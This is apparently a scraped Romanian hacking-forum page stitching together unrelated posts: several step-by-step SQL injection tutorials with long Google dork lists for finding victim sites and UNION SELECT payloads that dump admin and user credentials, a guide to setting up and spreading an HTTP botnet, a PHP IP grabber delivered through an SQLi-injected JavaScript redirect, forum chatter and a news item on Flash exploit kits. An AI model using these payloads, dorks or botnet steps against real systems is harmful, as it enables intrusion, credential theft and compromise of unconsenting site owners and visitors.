Aerosol

Foarte buna initiativa, felicitari Uite ca mai sunt si oamenii care nu se gandesc doar la bani...

Save 90% on PAYDAY™ The Heist on Steam pentru cei care nu stiati. 1,49$

@Coco mi-am cumparat acum un windows phone, nu ai nici-o metoda?

Credit's to: CookiesOwner SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. Step-by-Step tutorial for SQL Injection Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and like every other hack attack is the most time consuming, and is the only time consuming step. Once you get through this, rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks(google strings to find vulnerable sites). Though at the end of this post, we'll provide a list of vulnerable sites. Dorks: "inurl:index.php?catid=" "inurl:news.php?catid=" "inurl:index.php?id=" "inurl:news.php?id=" inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= and you can also write your own. How to check if a webpage is vulnerable to this attack??? Once you execute the dorks and get the preferred search results. Say for example http://www.abcd.com/index.php?catid=1 Add a ' (apos) at the end of the URL. Such that the URL looks like http://www.abcd.com/index.php?catid=1' If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result. Typical errors you'll get after appending the apostrophe are: Warning: mysql_fetch_array(): Warning: mysql_fetch_assoc(): Warning: mysql_numrows(): Warning: mysql_num_rows(): Warning: mysql_result(): Warning: mysql_preg_match(): Step 2:Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you. Append an 'order by' statement to the URL. eg. http://www.abcd.com/index.php?catid=1 order by 1 Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries. Append an 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus. Say from the above step, you got that the table has 6 columns. eg. http://www.abcd.com/index.php?catid=-1 union select 1,2,3,4,5,6 Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns. Step 3: Enumerating the SQL version We'll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2. eg. http://www.abcd.com/index.php?catid=-1 union select 1,@@version,3,4,5,6 You'll get the version of the database in the place where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site. Step 4: Expolit To get list of databases: http://www.abcd.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- Result will display a list of databases on the site. Here on, we'll write the results we have got from our test. Result: information_schema,vrk_mlm To know the current database in use: http://www.abcd.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6-- Result: vrk_mlm To get the current user: http://www.abcd.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6-- Result: vrk_4mlm@localhost To get the tables: http://www.abcd.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Result: administrator,category,product,users We'll concentrate our attack on the users table. To get the columns: hxxp://www.abcd.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName?,prodDesc, prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by?_id, refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position, email_id,password,edited_on,last_login,created_on,chain_number,phone,address By lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that. Extract information: union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refe?red_by_id,0 x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users-- ====================================================

How To Setup a HTTP Botnet + Getting a Website and Hosting. Credit's to: Re4orm Some things you need to know: A Botnet is a Panel that can keep many Computers connected to it. The Computers connected to it is called Bots. The bots will be under your Command so you will be able to command them to do things and they will do it. In this tutorial I will teach you how to setup a Botnet. Alright lets start. If you already got a Website + Hosting Dont click on this Spoiler, if you dont click PS. Website name cannot be longer than 12 Characters. This is how to create a free Website and get Free Hosting. First go to Dot.Tk and Register After you login go to Domain Panel and then add a Domain Name Now open a new browser and go to DerpyMail ( Free Hosting ) Add the free hosting to you cart and register then checkout! Go back to Dot.TK and go to the Domain Panel and Click Modify Change the Name Servers ( DNS/NS ) to ns1.derpymail.us ns2.derpymail.us Then wait for the Email with your new account information and continue to the next Part! Before doing anything Download the Botnet File's. To download the Botnet Click here. Step: 1 Extract the Botnet Files and then open up the Folder "Panel". Find Config.Php and Edit it with any writing Program. Step: 2 Now go to your Webhost and add SQL DB and User. When you are done with that upload the .sql to your sql DB from the Folder "SQL". Step: 3 Edit the SQL Connection info in Config.Php. Save when done. Step: 3 Upload everything in the Folder "Panel" to your Webhost. Now close the folder etc. Step: 4 Go to the Website you used to upload. Login to your Botnet with the password in Config.Php Congratulations! You got your own Botnet! Step: 5 Go back to the Folder "Botnet" and open up Build.exe. Then type in Your Domain Name and the Path. Build the File, Crypt & Spread!

Dar mai sunt useri incepatori si ii ajuta

Credit's to: Spanky Hello all members Do you know I m new here . But I want to share something for you . Today I will show you how to grab someone's IP Address using SQL Injection . Requirements : PHP IP Grabber Hosting or Shelled Website Javascript Knowledge or XSS knowledge SQL Injection Knowledge SQLi vulnerable website Ok . Lets Start brothers . PHP IP Grabber <?php //IP Grabber //Variables $protocol = $_SERVER['SERVER_PROTOCOL']; $ip = $_SERVER['REMOTE_ADDR']; $port = $_SERVER['REMOTE_PORT']; $agent = $_SERVER['HTTP_USER_AGENT']; $ref = $_SERVER['HTTP_REFERER']; $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']); //Print IP, Hostname, Port Number, User Agent and Referer To Log.TXT $fh = fopen('log.txt', 'a'); fwrite($fh, 'IP Address: '."".$ip ."\n"); fwrite($fh, 'Hostname: '."".$hostname ."\n"); fwrite($fh, 'Port Number: '."".$port ."\n"); fwrite($fh, 'User Agent: '."".$agent ."\n"); fwrite($fh, 'HTTP Referer: '."".$ref ."\n\n"); fclose($fh); ?> Create a file called LOG.TXT in the same folder as this .php script! Copy above code and open notepad.exe , paste this . Save this note as filename.php . Then you must save blank note as log.txt . Now you have PHP IP Grabber . Next Step is Hosting or Shelled Website . Upload your filename.php and log.txt . URL wiil be like this . http://hosting.com/filename.php and http://hosting.com/log.txt You must send http://hosting.com/filename.php to victim. After Victim click you sent URL , you can see IP address at http://hosting.com/log.txt . But I want to show you sending method to victim , It is very simple and affective for me . Because I have many of SQL Injectors . Now you must search SQLi Vulnerable sites and inject it . Ok . Now , I specify you have been a SQLi vulnerable site . http://www.site.com/catid=3 union select 1,2,@@version,4,5-- Above SQL Query will show you about of SQL Version . If you have SQL Knowledge . You will know it easily . I told you , you must know about of javascript or XSS script . Look at following code . <script>window.location.href="http:// www.yourhosting.com/yourfilename.php"</script> This code stand for URL redirect , You can use this code instead of @@version in SQLi Querys . So Our Final Code will following http://www.site.com/catid=3 union select 1,2,0x<script>window.location.href="http:// www.yourhosting.com/yourfilename.php"</script> ,4,5-- You need to change string to hex behind the 0x . You can chane Text to hex value at following site. http://www.swingnote.com/tools/texttohex.php Now you can send this URL to any SQL Injectors

Credit's to: Joker Step 1. The website Okay so this website has been designed very poorly. It has a constant design color of green and some stupid navigation panel. It has multiple places such as "Products" and "Links". Overall this website is pretty shitty. Step 2. Finding the vulnerability Okay before we actually are able to do this attack we need to find a vulnerability. To do this we will have to go to pages and click on other pages we find within the main page we clicked on, for this example I'll use "Products". After you are in the "Products" section just click on a product and then we can get into the fun part, I'll be using "Herbs" for this. After you chose your product group such as "Herbs" click on a product within the category and you will be taken to the page for that product. To notice if we have found a vulnerable page in the "Products" section look at the website URL, it should have something like products.php?prodid=<number> If it does then to find out if it is vulnerable we need to put a ' or a fucked up piece of math logic such as 1=0-- If done correctly the URL should look like products.php?prodid=<number>' or 1=0-- If the site is vulnerable you should have an error like this. Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=0--' at line 1 Step 3. Exploiting the vulnerability If you got this far you have obviously understood the first 2 steps, now let's move on. Once you have found your vulnerability we can now exploit it in order to get some info that we shouldn't be able to get. First let's start with getting the table names on the page by typing in the following into the website url. products.php?prodid=<number> order by 20-- Now for this website it should have came up with an error that says, Error performing query: Unknown column '20' in 'order clause' if it does than we know our number is too big, so let's cut the number in half with 15 and put it into the URL. products.php?prodid=<number> order by 15-- Once again we should get the same error but this time the number should be 15. We are now going to drop down 5 more times to 10, if done correctly it should be. products.php?prodid=<number> order by 10-- We also get the same error just with the number 10, so why not drop to 5? products.php?prodid=<number> order by 5-- Holy shit we no longer have an error!, but we still need to find the max number we can go at in order to do this attack properly. I suggest you increment the number by 1 until you can no longer can view the page and begin to get an error again. Step 4. Finding the table names If you have managed to follow all the steps properly you are now able to start getting the table and column names. For this section of the tutorial we will be covering how to get the table names first. Okay so, to get the name of what is known as in the SQL syntax as a "table" we need to add some more lines of code into the URL bar. The code we will be adding needs to have what we currently have, deleted. After what we currently have we need to insert the following code. products.php?prodid=-<number> union select 1,2,3,4,5,6,7-- If done correctly you should see a number on your screen, this shows what number is vulnerable and we can start attacking. If this was not done correctly and you still see words on the screen place a minus sign(-) in front of the product id. Now to get the table names we need to format the URL string as followed. products.php?prodid=-<number> union select 1,2,table_name,4,5,6,7 from information_schema.tables-- If done correctly you should see text such as. CHARACTER_SETS You may now scroll through the tables and see what you would like, I want to get admin login info so I will use the "admin" table I have found. Step 5. Getting column names Okay to get the names of what is known in the SQL syntax as a"column" all we need to do is go back to what we need in "Step 4" and just change it with this. products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns-- Once this is done you may look through what you want and as I said, I wanted admin login. I will proceed to use the columns "login" and "password". Step 6. Getting our login info Okay now to get the login info that we wanted we need to make sure that we wrote down what the info was to get it, if we didn't we need to look again. Now since I wrote the info I needed down I now know that what I need to use is below. login, password, admin Now you may be wondering how do we use what we have obtained, well it's simple. Just follow my instructions and you will have admin info. To get the info we need to take the string we currently have which should be. products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns We need to replace "column_name" and "schema.columns" with "concat(login,0x3a,password" and "admin". Once this is done it should look like this. products.php?prodid=-<number> union select 1,2,concat(login,0x3a,password),4,5,6,7 from admin--

Credit's to: Tumppi?²? Finding a vulnerable Site. So you want to hack a site. Well first you need to find one to attack. For this you will need what is called a 'Google Dork'. Below is a small example of one of these. inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:recruit_details.php?id= inurl:index.php?cPath= ASP DORK nurl:”add.asp?bookid=” inurl:”add_cart.asp?num=” inurl:”addcart.asp?” inurl:”addItem.asp” inurl:”add-to-cart.asp?ID=” inurl:”addToCart.asp?idProduct=” inurl:”addtomylist.asp?ProdId=” inurl:”adminEditProductFields.asp?intProdID=” inurl:”advSearch_h.asp?idCategory=” inurl:”affiliate.asp?ID=” inurl:”affiliate-agreement.cfm?storeid=” inurl:”affiliates.asp?id=” inurl:”ancillary.asp?ID=” inurl:”archive.asp?id=” inurl:”article.asp?id=” inurl:”aspx?PageID” inurl:”basket.asp?id=” inurl:”Book.asp?bookID=” inurl:”book_list.asp?bookid=” inurl:”book_view.asp?bookid=” inurl:”BookDetails.asp?ID=” inurl:”browse.asp?catid=” inurl:”browse_item_details.asp” inurl:”Browse_Item_Details.asp?Store_Id=” inurl:”buy.asp?” inurl:”buy.asp?bookid=” inurl:”bycategory.asp?id=” inurl:”cardinfo.asp?card=” inurl:”cart.asp?action=” inurl:”cart.asp?cart_id=” inurl:”cart.asp?id=” inurl:”cart_additem.asp?id=” inurl:”cart_validate.asp?id=” inurl:”cartadd.asp?id=” inurl:”cat.asp?iCat=” inurl:”catalog.asp” inurl:”catalog.asp?CatalogID=” inurl:”catalog_item.asp?ID=” inurl:”catalog_main.asp?catid=” inurl:”category.asp” inurl:”category.asp?catid=” inurl:”category_list.asp?id=” inurl:”categorydisplay.asp?catid=” inurl:”checkout.asp?cartid=” inurl:”checkout.asp?UserID=” inurl:”checkout_confirmed.asp?order_id=” inurl:”checkout1.asp?cartid=” inurl:”comersus_listCategoriesAndProducts.asp?idCategory =” inurl:”comersus_optEmailToFriendForm.asp?idProduct=” inurl:”comersus_optReviewReadExec.asp?idProduct=” inurl:”comersus_viewItem.asp?idProduct=” inurl:”comments_form.asp?ID=” inurl:”contact.asp?cartId=” inurl:”content.asp?id=” inurl:”customerService.asp?TextID1=” inurl:”default.asp?catID=” inurl:”description.asp?bookid=” inurl:”details.asp?BookID=” inurl:”details.asp?Press_Release_ID=” inurl:”details.asp?Product_ID=” inurl:”details.asp?Service_ID=” inurl:”display_item.asp?id=” inurl:”displayproducts.asp” inurl:”downloadTrial.asp?intProdID=” inurl:”emailproduct.asp?itemid=” inurl:”emailToFriend.asp?idProduct=” inurl:”events.asp?ID=” inurl:”faq.asp?cartID=” inurl:”faq_list.asp?id=” inurl:”faqs.asp?id=” inurl:”feedback.asp?title=” inurl:”freedownload.asp?bookid=” inurl:”fullDisplay.asp?item=” inurl:”getbook.asp?bookid=” inurl:”GetItems.asp?itemid=” inurl:”giftDetail.asp?id=” inurl:”help.asp?CartId=” inurl:”home.asp?id=” inurl:”index.asp?cart=” inurl:”index.asp?cartID=” inurl:”index.asp?ID=” inurl:”info.asp?ID=” inurl:”item.asp?eid=” inurl:”item.asp?item_id=” inurl:”item.asp?itemid=” inurl:”item.asp?model=” inurl:”item.asp?prodtype=” inurl:”item.asp?shopcd=” inurl:”item_details.asp?catid=” inurl:”item_list.asp?maingroup” inurl:”item_show.asp?code_no=” inurl:”itemDesc.asp?CartId=” inurl:”itemdetail.asp?item=” inurl:”itemdetails.asp?catalogid=” inurl:”learnmore.asp?cartID=” inurl:”links.asp?catid=” inurl:”list.asp?bookid=” inurl:”List.asp?CatID=” inurl:”listcategoriesandproducts.asp?idCategory=” inurl:”modline.asp?id=” inurl:”myaccount.asp?catid=” inurl:”news.asp?id=” inurl:”order.asp?BookID=” inurl:”order.asp?id=” inurl:”order.asp?item_ID=” inurl:”OrderForm.asp?Cart=” inurl:”page.asp?PartID=” inurl:”payment.asp?CartID=” inurl:”pdetail.asp?item_id=” inurl:”powersearch.asp?CartId=” inurl:”privacy.asp?cartID=” inurl:”prodbycat.asp?intCatalogID=” inurl:”prodetails.asp?prodid=” inurl:”prodlist.asp?catid=” inurl:”product.asp?bookID=” inurl:”product.asp?intProdID=” inurl:”product_info.asp?item_id=” inurl:”productDetails.asp?idProduct=” inurl:”productDisplay.asp” inurl:”productinfo.asp?item=” inurl:”productlist.asp?ViewType=Category&CategoryID= “ inurl:”productpage.asp” inurl:”products.asp?ID=” inurl:”products.asp?keyword=” inurl:”products_category.asp?CategoryID=” inurl:”products_detail.asp?CategoryID=” inurl:”productsByCategory.asp?intCatalogID=” inurl:”prodView.asp?idProduct=” inurl:”promo.asp?id=” inurl:”promotion.asp?catid=” inurl:”pview.asp?Item=” inurl:”resellers.asp?idCategory=” inurl:”results.asp?cat=” inurl:”savecart.asp?CartId=” inurl:”search.asp?CartID=” inurl:”searchcat.asp?search_id=” inurl:”Select_Item.asp?id=” inurl:”Services.asp?ID=” inurl:”shippinginfo.asp?CartId=” inurl:”shop.asp?a=” inurl:”shop.asp?action=” inurl:”shop.asp?bookid=” inurl:”shop.asp?cartID=” inurl:”shop_details.asp?prodid=” inurl:”shopaddtocart.asp” inurl:”shopaddtocart.asp?catalogid=” inurl:”shopbasket.asp?bookid=” inurl:”shopbycategory.asp?catid=” inurl:”shopcart.asp?title=” inurl:”shopcreatorder.asp” inurl:”shopcurrency.asp?cid=” inurl:”shopdc.asp?bookid=” inurl:”shopdisplaycategories.asp” inurl:”shopdisplayproduct.asp?catalogid=” inurl:”shopdisplayproducts.asp” inurl:”shopexd.asp” inurl:”shopexd.asp?catalogid=” inurl:”shopping_basket.asp?cartID=” inurl:”shopprojectlogin.asp” inurl:”shopquery.asp?catalogid=” inurl:”shopremoveitem.asp?cartid=” inurl:”shopreviewadd.asp?id=” inurl:”shopreviewlist.asp?id=” inurl:”ShopSearch.asp?CategoryID=” inurl:”shoptellafriend.asp?id=” inurl:”shopthanks.asp” inurl:”shopwelcome.asp?title=” inurl:”show_item.asp?id=” inurl:”show_item_details.asp?item_id=” inurl:”showbook.asp?bookid=” inurl:”showStore.asp?catID=” inurl:”shprodde.asp?SKU=” inurl:”specials.asp?id=” inurl:”store.asp?id=” inurl:”store_bycat.asp?id=” inurl:”store_listing.asp?id=” inurl:”Store_ViewProducts.asp?Cat=” inurl:”store-details.asp?id=” inurl:”storefront.asp?id=” inurl:”storefronts.asp?title=” inurl:”storeitem.asp?item=” inurl:”StoreRedirect.asp?ID=” inurl:”subcategories.asp?id=” inurl:”tek9.asp?” inurl:”template.asp?Action=Item&pid=” inurl:”topic.asp?ID=” inurl:”tuangou.asp?bookid=” inurl:”type.asp?iType=” inurl:”updatebasket.asp?bookid=” inurl:”updates.asp?ID=” inurl:”view.asp?cid=” inurl:”view_cart.asp?title=” inurl:”view_detail.asp?ID=” inurl:”viewcart.asp?CartId=” inurl:”viewCart.asp?userID=” inurl:”viewCat_h.asp?idCategory=” inurl:”viewevent.asp?EventID=” inurl:”viewitem.asp?recor=” inurl:”viewPrd.asp?idcategory=” inurl:”ViewProduct.asp?misc=” inurl:”voteList.asp?item_ID=” inurl:”whatsnew.asp?idCategory=” inurl:”WsAncillary.asp?ID=” -------------------------------------------------------------------------------- SQL DORK inurl:”id=” & intext:”Warning: mysql_fetch_assoc() inurl:”id=” & intext:”Warning: mysql_fetch_array() inurl:”id=” & intext:”Warning: mysql_num_rows() inurl:”id=” & intext:”Warning: session_start() inurl:”id=” & intext:”Warning: getimagesize() inurl:”id=” & intext:”Warning: is_writable() inurl:”id=” & intext:”Warning: getimagesize() inurl:”id=” & intext:”Warning: Unknown() inurl:”id=” & intext:”Warning: session_start() inurl:”id=” & intext:”Warning: mysql_result() inurl:”id=” & intext:”Warning: pg_exec() inurl:”id=” & intext:”Warning: mysql_result() inurl:”id=” & intext:”Warning: mysql_num_rows() inurl:”id=” & intext:”Warning: mysql_query() inurl:”id=” & intext:”Warning: array_merge() inurl:”id=” & intext:”Warning: preg_match() inurl:”id=” & intext:”Warning: ilesize() inurl:”id=” & intext:”Warning: filesize() inurl:”id=” & intext:”Warning: filesize() inurl:”id=” & intext:”Warning: require() inurl:(0x3a,version inurlSad@version,0x3a,databse) inurl:(user,0x3a,pass) inurl:+union+select+ from inurl:+union+select+ pass inurl:+union+select+ SHOP inurl:+union+select+ admin inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= You will need to search these in google to find your victims site... Testing for A Vulnerablity Okay, so you have your site and you want to see if its vulnerable. What do? well that's simple! all you have to do is take your url and add an apostrophe. for example: https://site.com/store.php?id=4 turns into https://site.com/store.php?id=4' If you get an error from that, you have a vulnerable site. Finding the number of columns Right, Now we get moving. You now need to find the number of columns... Here's how we do this: https://site.com/store.php?id=4 order by 2-- (No Error) https://site.com/store.php?id=4 order by 3-- (No Error) https://site.com/store.php?id=4 order by 4-- (NO Error) https://site.com/store.php?id=4 order by 5-- (Error) Now we get an error on 5. This Means there are 4 columns. Finding the Vulnerable Column So now we know how many columns there are we need to find the Vulnerable column. Here's how we do this: https://site.com/store.php?id=-4 UNION SELECT 1,2,3,4-- (We have to remember to add the hyphen after the id= or the site will return a normal page) A Number (or a few)should show up in the browser. Take the biggest one and that's the vulnerable column. for example purposed lets say i got 2. Finding the Database Version Now We need to know the database version. Here's how we do it: https://site.com/store.php?id=-4 UNION SELECT 1,@@version,3,4-- The database version should now be displayed in the browser. Finding the database name Now we have the version we need the DBname. To get this we enter: https://site.com/store.php?id=-4 UNION SELECT 1,concat(database()),3,4-- Now we should have the DBname in browser. Finding the tables Now we need to find the tables. This is how you can do it: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- Now we should have the names of the tables. Viewing the tables Informtion Now we want the information so we enter this into the URL: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="userinfo" This will Probably return an error. If it does, never fear! find a string to hex converter and convert to hex. Use something like String Functions Online For example mine would become this: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x75736572696e666f0d0a You MUST! add the 0x or the server wont know it's a command. Displaying The tables Contents Now you want to see the contents. so enter this: https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(user,0x3a,password),3,4 FROM DBname.userinfo-- Now all you need to do is find the admin login page and you're in! Upload a Shell, r00t the server, deface the site... whatever you want. This should get you going in the world of SQLi

Multam, am cautat de ceva timp prima tema, o vroia un amic pentru blog.

Adobe today revised a security bulletin it released more than a month ago, adding a patch for a code-execution vulnerability in Flash Player already included in some exploit kits. French researcher Kafeine found the exploits in the Angler and Nuclear kits less than a week after Adobe released an update Oct. 14. The update addressed three CVEs, all of which could lead to memory corruption or integer overflows, enabling attackers to remotely load and execute code on the compromised computer. Today’s patch adds CVE-2014-8439, reported by Kafeine to Adobe. Fiesta and Angler are used to compromise vulnerable websites and redirect site visitors to sites hosting banking malware, malvertising schemes and other attacks. Flash Player bugs are among the most common vulnerabilities exploited by such kits, as well as Java and Microsoft Silverlight vulnerabilities. The inclusion of the Oct. 14 CVEs in the exploit kits was worrisome to Kafeine, who does extensive research into these attack tools, noting that an attacker likely found a way to reverse-engineer the Adobe patch in order to drop it in the EK inside of a week. Kafeine said that the Adobe patches released on Oct. 14 likely protected users from the active exploits, but the vulnerability remained exposed to future exploit development. Today’s update moves Flash Player to version 15.0.0.239 for Windows and Macintosh users, and 11.2.202.424 for Linux users. Chrome and Internet Explorer users will be updated automatically by Google and Microsoft respectively. Another Adobe exploit in Angler was reported last week, also by Kafeine. This vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers. Source

